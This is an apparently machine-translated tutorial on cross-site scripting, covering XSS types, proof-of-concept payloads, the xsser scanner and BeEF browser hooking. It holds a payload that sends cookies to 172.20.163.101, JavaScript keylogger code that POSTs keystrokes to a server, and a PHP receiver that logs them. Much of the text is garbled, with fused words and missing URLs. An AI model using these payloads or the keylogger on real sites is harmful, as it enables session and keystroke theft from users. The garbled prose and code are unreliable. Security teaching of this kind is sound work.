XSS principle and its corresponding tools



XSS(severity: as long asjsWhat functions can be achieved,xssCan be rightclientWhat harm does it cause):


Principle: throughwebSite vulnerability, delivering malicious script code to the client to achieve the purpose of attack on the client


Main purpose of attack(Website mount: throughXSSInsert a malicious message into the front pagejsLinks,clientWhen visiting this page, the malicious execution is requested at the same timejs, this malicejsIt’s a web Trojan)

1Stealingcookie(Collection existsXSSVulnerability website user’scookie)

2Redirection(Go directly to the gambling page or phishing website when visiting the real page)

3DDOSThe third party(It takes a lot of calculationURLSticking to existenceXSSOn the vulnerable website, users who visit the website will ask for the one that needs a lot of computing powerURL, and thenURLServerCCattack)




1Storage type(Persistent type)  ===> takejsScript upload toserver, accessed by other usersserverThis will be loaded whenjse.g: Forum post,serverThe content of the post was not filtered, resulting in an uploaded paragraphjsScript

2Reflective type(Non persistent)(Whatever you send to the target, you have to return something. There can be no change)  ===> clientMaliciousjsIssueserver(clientCan bejsIncluded ingetRequest header)serverI’ll take this again.jsReturn toclientclientYou can run this in a browserjs===> Through social work, thejsA link to the script is sent to the victim,e.g:

3DOMtype(In essence, it is also a reflection type)   ===> Not necessarilyjsUpload toserverCan be inclientimplement




POCVerification principle:


Inject all variablesjsCode to test


Test statement(Poc)

alert(‘xss’)   ===> jsPopup

click   ===> htmlHyperlink

window.location=’http://www.baidu.com’   ===> Redirect to Baidu

new Image().src=””+document.cookie;   ===> takecookieSend to172.20.163.101

 ===> automatic requesthttp://, you can. real malicejsScript





An example of how to hang a horse on a web page(Keyboard recording function)



1ThroughxssUpload Trojan file link to vulnerability server

2clientAccess to the server will be requested and executedhttp://

3a.jstakeclientSend keyboard records of to specified server(“POST”,””,true)



Keyboard recorder(jsCode)


document.onkeypress = function(evt) {

  evt = evt || window.event

  key = String.fromCharCode(evt.charCode)

  if (key) {

    var http = new XMLHttpRequest();

    var param = encodeURI(key)

    http.open(“POST”,””,true);   =====> Send recorded results tohttp://







Password receiver(phpCode, note: this code can only record the keyboard record of the current page, not other website pages)




$logfile=”keylog.txt”;      ======> The received result existskeylog.txtIn file

$fp = fopen($logfile, “a”);

fwrite($fp, $key);









Xsser(XSSVulnerability detection tools)


xsser –gtk   ===> How to open graphical interface


xsserUse example:xsser -u “” -g “xss_r/?name=” –cookie=”security=low; PHPSESSID=34554fae634cb96063453427536bda0b” -s -v –reverse-check


-u Pending detectionurl(Note: only write to the penultimate directory)

-g UseGETMethod, usingPOSTMethod can be changed‘-p’Parameters. Followed by the name of the variable to detect(Pay attention to bring the upper level directory of variables)

–cookie cookieinformation

-s Shows the total number of probes sentpayload

-v Show details

–reverse-check: if this parameter is not addedxsserOnly one will be senthashValue to the server to see if thehashReturn intact. But there may be a problem: the server is not filteredhashValue, but filteredhtml(js)Code, causingxsserShow thatxssLoopholes, but they can’t be really exploited. After adding this parameterxsserWill send another real onejsScript to detect(TransmittedjsThe script function is to actively connect one of its own ports, ifxsserFind willjsAfter sending it, it will connect to its own port, which means that the other party existsxssLoophole)



–heuristic Check filtered characters(Some security devices may filter out some specific characters. With this parameter, you can see which characters are filtered out by security devices)(Principle: send individual characters that may be filtered individually to see if they are returned)


The following parameters encode the submitted data

–Str               Use method String.FromCharCode()

–Une               Use Unescape() function

–Mix               Mix String.FromCharCode() and Unescape()

–Dec               Use Decimal encoding

–Hex               Use Hexadecimal encoding

–Hes               Use Hexadecimal encoding with semicolons

–Dwo               Encode IP addresses with DWORD

–Doo               Encode IP addresses with Octal

–Cem=CEM           Set different ‘Character Encoding Mutations’

                        (reversing obfuscators) (ex: ‘Mix,Une,Str,Hex’)


In addition to the specified variables, some special places are injected:

–Coo               YesCOOKIEConductxssInjection detection

–Xsa               Yesuser-agentConductxssInjection detection

–Xsr               YesRefererConductxssInjection detection

–Dcp               For data control protocolxssInjection detection

–Dom               YesDOMType conductxssInjection detection

–Ind               IND – HTTP Response Splitting Induced code

–Anchor            ANC – Use Anchor Stealth payloader (DOM shadows!)








beef(User’s browser can be manipulated)


utilizeXSSLoopholes or middleman hijacking will be specificjsServer’s IP >: 3000 / hook. JS “>)Insert web page, thisjsConnect the control client browser back tobeefThe server.


let me put it another way:Server’s IP >: 3000 / hook. JS “> It’s just one.jsTrojan horsebeefServers are trojansserverEnd.



Menu details:


Details: Browser, plug-in version information; operating system information


Logs: record the actions of the browser, such as focus change, mouse click, information input, etc


Commands: command module

Green module: indicates that the module is suitable for the target browser and the execution result is not visible to the client

Red module: indicates that the module is not suitable for the current user, and some red modules can also be executed normally

Orange module: the module is available, but the results are visible to the user(CAMPop up application authority, etc.)

Grey module: module not tested on target browser